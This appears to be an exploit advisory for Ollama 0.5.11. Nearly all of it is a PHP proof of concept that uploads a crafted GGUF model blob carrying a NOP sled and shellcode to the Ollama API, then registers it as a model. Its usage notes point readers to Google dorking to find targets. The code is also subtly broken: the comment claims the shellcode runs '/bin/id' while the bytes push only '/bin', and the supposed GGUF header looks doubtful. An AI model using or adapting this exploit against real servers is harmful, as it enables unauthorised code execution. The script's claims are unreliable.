=============================================================================================================================================
| # Title     : Ollama 0.5.11 Code Injection Vulnerability                                                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://github.com/ollama/ollama                                                                                            |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] This code contains : 

    Uploading untrusted files which may lead to RCE command execution vulnerabilities. 
 
    Injecting malicious shellcode into the model file.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] Change the target link of the two lines = 9 + 27

[+] PayLoad :

<?php

function get_sha256($raw_content) {
    return hash('sha256', $raw_content);
}

function upload_model($model_raw_content) {
    $upload_url_base = 'http://localhost:11434/api/blobs/sha256:%s';
    $sha256 = get_sha256($model_raw_content);
    $upload_url = sprintf($upload_url_base, $sha256);
    
    $ch = curl_init($upload_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $model_raw_content);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    echo "upload_model response: " . $response . "\n";
    return $sha256;
}

function create_model($model_name, $sha256) {
    echo "create_model from file: ~/.ollama/models/blobs/sha256-$sha256\n";
    $url = 'http://localhost:11434/api/create';
    $data = [
        "model" => $model_name,
        "files" => [
            "test.gguf" => "sha256:$sha256"
        ]
    ];
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    echo "create_model response: " . $response . "\n";
}

// إنشاء ملف GGUF بصيغة صحيحة مع تعبئة البيانات
$model_contents = "FUGG00000000000000000000"; // رأس GGUF صالح
$model_contents .= "\x00\x00\x00\x01"; // n_kv قيمة صغيرة
$model_contents .= "\x00\x00\x00\x01"; // بيانات إضافية
$model_contents .= "0000\xaa0000000"; // تعبئة البيانات

// شيل كود: NOP sled + تنفيذ أمر execve("/bin/id")
$shellcode = str_repeat("\x90", 50); // NOP sled
$shellcode .= "\x31\xc0\x50\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

// إضافة الشيل كود إلى محتوى الموديل
$model_contents .= $shellcode;

// إضافة تعبئة لتجنب EOF غير متوقع
$model_contents .= str_repeat("\x00", 1024);

// رفع الموديل
$sha256 = upload_model($model_contents);

// إنشاء اسم فريد للموديل
$model_name = "testing-model-" . uniqid();
create_model($model_name, $sha256);

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================